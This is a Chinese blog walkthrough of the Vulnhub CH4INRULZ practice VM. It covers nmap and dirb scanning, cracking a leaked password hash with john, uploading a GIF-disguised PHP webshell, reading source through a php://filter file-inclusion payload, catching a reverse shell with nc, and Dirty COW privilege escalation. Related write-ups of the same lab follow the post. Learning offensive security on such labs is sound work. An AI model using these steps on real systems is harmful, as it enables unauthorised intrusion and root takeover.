CH4INRULZ靶机渗透

最新推荐文章于 2024-04-26 23:33:44 发布
最新推荐文章于 2024-04-26 23:33:44 发布
阅读量212 收藏 3
点赞数 1
文章标签: 安全 linux web安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64809022/article/details/131411157
版权

1.安装靶机

靶机地址:https://www.vulnhub.com/

在搜索框输入CH4INRULZ

 择下载项

 选择合适的位置,放置文件,双击打开,在虚拟机打开

 2.测试前的信息收集

 3.启动靶机

先将网络适配器调整成NAT模式在启动靶机

4.扫描

启动kali,使用nmap,扫描靶机的IP地址

 访问这个地址

 尝试获取源代码

回头看端口

21 ftp 端口 

22 ssh 端口

80 WEB端口,

8011 位置端口

nmap:                                                                                     

使用nmap带参数的扫描

nmap -A ip -p0-65535

 由于开放21 22 80端口,又有Apache的存在,猜测8011为PHP的某个端口

FTP:                                                                                        

ftp 192.168.179.150

FTP提示Anonymous FTP login allowed ,允许匿名登录,登录名为:anonymous,密码为空,但没发现有价值的信息

dirb

搜索网站

 development处需要登录,其他没有有用信息

dirb http://192.168.179.150 -X .bak

查看index.html.bak文件

 

这里我们得到了提示,用户名:密码格式的。应该是我们之前development的用户,不过这个密码被加密了。

john:                                                                                       

解密的话,就需要用到我们的john工具了。

我们把 frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 写入文件password.txt

在终端输入

john /home/kali/桌面/password --show

 

 解密得到:frank:frank!!!

访问development文件夹:

 

登录并查看uploader目录:

上传图片木马:                                                                          

可以上传图片,我们试着上传一个图片木马

webshell.php前加上图片头 GIF89a 后缀改成.gif 这样我们的图片就制作好了

 上传木马

 但是他路径没有告诉我们,我们需要访问他来运行这个木马  我们试着打开8011端口,没有信息,dirb扫一下目录

  这里是一个api接口 那个files_api.php应该可以进行文件读取

 我们访问files_api.php 试试

 下载max hackbar

使用hackbar                                                                             

get post都试一下,之后发现post可以

/var/www/development/uploader/upload.php

 

正常来说,我们应该读upload.php的文件,但是这里的回显表名,我们的upload.php被执行了 

filter:加密                                                                               

既然我们正常读取的话,可以按php代码来执行,那么我们直接filter读取一下upload.php

post: 

file=php://filter/convert.base64encode/resource=/var/www/development/uploader/upload.php

 

 解密base64内容:

可以得知我们上传的文件在 FRANKuploads/ 目录下

执行file=/var/www/development/uploader/FRANKuploads/webshell.gif

 

nc -lvvp 4444 访问 拿到shell

 

Python交互:                                                                          

python -c 'import pty;pty.spawn("/bin/bash");' 转化为交互式

提权:

查看内核版本,可以使用脏牛提权

 

脏牛版本:

 

 

创建了一个用户firefart

我们连接一下firefart@192.168.179.150 

 root组里用户,root权限

 获取到flag

wsy678
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Vulnhub靶机系列:ch4inrulz: 1.0.1
汗的博客
04-30 580
这次的靶机是vulnhub靶机ch4inrulz: 1.0.1,还是在合天网安里做。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/ch4inrulz-101,247/ Frank has a small website and he is a smart developer wit...
CH4INRULZ靶机渗透测试
weixin_49340699的博客
06-23 347
CH4INRULZ靶机渗透测试环境工具流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searchsploit,dirb,御剑,在线解码工具,wget 流程 首先对目标网段进行主机发现扫描然后扫端口 发现有80端口上去也没有发现什么收获 回来目录爆破发现几个目录啥也没有就http://192.168.1.103/development这个目录弹了个登录框可咱也没有账号密码啊 换御剑继续扫 看见一个bak访
靶机CH4INRULZ_v1.0.1
weixin_43940853的博客
12-12 508
kali : 192.168.230.236 靶机 : 192.168.230.238 与之前的靶机不同,这次有ftp和8011,先登陆ftp看看 发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说) 接着看看80没有什么发现 找不到可入手的地方(80网页先暂时放一放) 一开始有一个8011端口,我们访问一下 访问之...
CH4INRULZ-v1靶机练习实践报告
黑战士的博客
04-26 740
熟练使用工具metasploit(scanner/http/dir_scanner)、searchsploit、nitko、john看到网站的全貌和功能后要想到可能存在的漏洞,可以利用的方法。熟悉任意文件读漏洞、文件上传漏洞、各种图片文件格式等。
靶场练习第八天~vulnhub靶场之CH4INRULZ_v1.0.1
qq_57976347的博客
02-02 1721
一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现,使用nmap命令 具体使用方法:nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端口 3.用dirb命令,扫描隐藏文件或者网址 (1)使用 dirb http://192.168.101.109,扫描到一个development..
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 456
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
Ch4.rar_CH4
07-14
数字图像处理,利用matlab开发环境进行编程实践。
ch4.zip_java ch4
09-19
在本章"ch4"中,我们将深入探讨Java字符串的使用和相关知识点。以下是对这些内容的详细阐述: 1. **字符串类`String`**:在Java中,字符串被定义为不可变对象,这意味着一旦创建了字符串对象,就不能更改它的内容。...
CH4.rar_CH4_C语言
09-23
本资料"CH4.rar"聚焦于C语言中的常用算法,旨在帮助开发者深入理解和掌握这些核心算法,从而提升编程能力。 一、数组与指针 C语言中的数组和指针是实现算法的基础。数组是一种存储相同类型元素的集合,可以通过...
ch4-Threads.ppt
01-03
ch4-Threads.ppt
靶机渗透CH4INRULZ_v1.0.1(三)
Delity的博客
07-27 394
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.143.129 nmap -sP 192.168.19.0/24 2.扫描靶机开放了哪些端口 nmap -sV 192.168.143.129 可以发现靶机开放了21 22 80 8011端口,可以从ssh服务、web服务进行入手 三、渗透过程 1.通过端口扫描发现21为FTP服务,版本为vsftpd 2.3.5;22为SSH服务,版本为OpenSSH 5
Vulnhub靶场渗透-CH4INRULZ_v1.0.1
paidx0
09-24 635
前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用 扫描 80 端口 扫描 8011 端口 看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件 对这个解密,拿到一对账号密码 ...
[Vulnhub] CH4INRULZ_v1.0.1
weixin_63231007的博客
07-05 820
目录信息搜集图片🐎拿shell提权下载链接:ch4inrulz: 1.0.1 ~ VulnHubnmap -sP kali-ip得到靶机ip:192.168.236.136nmap -A 192.168.236.136 看看靶机开放了哪些服务 开放21 ftp 22 ssh 80和8011 http服务访问一下试试 发现是一个类似于博客的页面 dirb 扫描一下后台看看有没有登录地址或者隐藏页面 development处需要登录,其他没有有用信息dirb http://192.168.236.136 -.
VulnHub——CH4INRULZ
江左盟的博客
04-13 1111
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
靶场渗透CH4INRULZ_v1.0.1
qq_35664104的博客
09-18 468
靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247/) 好久没有来做内网渗透了,碰巧遇到一个新鲜点的靶场,就来试一下。 kali:192.168.0.100 靶机: 192.168.0.101 先扫一下端口 nmap -sS -A -p- 192.168.0.101 开启了ftp,ssh,http服务,打开他的网址上去一看,是一个未完成的个人博客。在他的网站上并没有找到什么线索,u
vulnhub Ch4inrulz 1.0.1
分享
10-01 104
vulnhub靶机Ch4inrulz 1.0.11复现
Vulnhub:CH4INRULZ渗透测试
mandarava的博客
09-15 803
文章目录0x01 环境搭建0x02 环境来源0x03 渗透过程80端口信息收集8011信息收集脏牛提权 0x01 环境搭建 靶机IP 攻击IP 备注 172.17.135.35 172.17.135.51 本机 192.168.179.129 kali 172.17.135.48 同网段服务器 0x02 环境来源 vulnhub官网:https://download...
VulnHub靶场之CH4INRULZ_v1.0.1
qq_42307546的博客
04-26 1655
下载地址:http%3A//download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 主机发现 netdiscover -i eth0 -r 192.168.1.0/24 端口信息探测 nmap -p 1-65535 -vv -sC 192.168.1.21 80和8011,22,21开放,先访问80端口 扫描web目录 gobuster dir -u http://192.168.1.21/ -w /usr/share/wordlists/dirb
python ch4安装
最新发布
05-24
安装 Python 的第一步是从官方网站 https://www.python.org/downloads/ 下载相应的安装包。选择适合你操作系统的版本,如果你不确定该选择哪个版本,可以选择默认的安装程序。 在下载完安装包后,运行安装程序,打开“安装向导”窗口。在这个窗口中,你可以选择安装路径和一些其他选项。如果你不确定哪些选项需要更改,可以直接使用默认设置。 完成这些设置后,Python 就会被安装到你的电脑上。在 Windows 操作系统上,你可以在命令行中输入 python 命令来启动 Python 解释器。在 Mac 和 Linux 系统中,可以使用终端来启动 Python。 如果你想在 Windows 操作系统中使用 IDLE(Python 自带的集成开发环境),可以从“开始”菜单中找到它并启动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值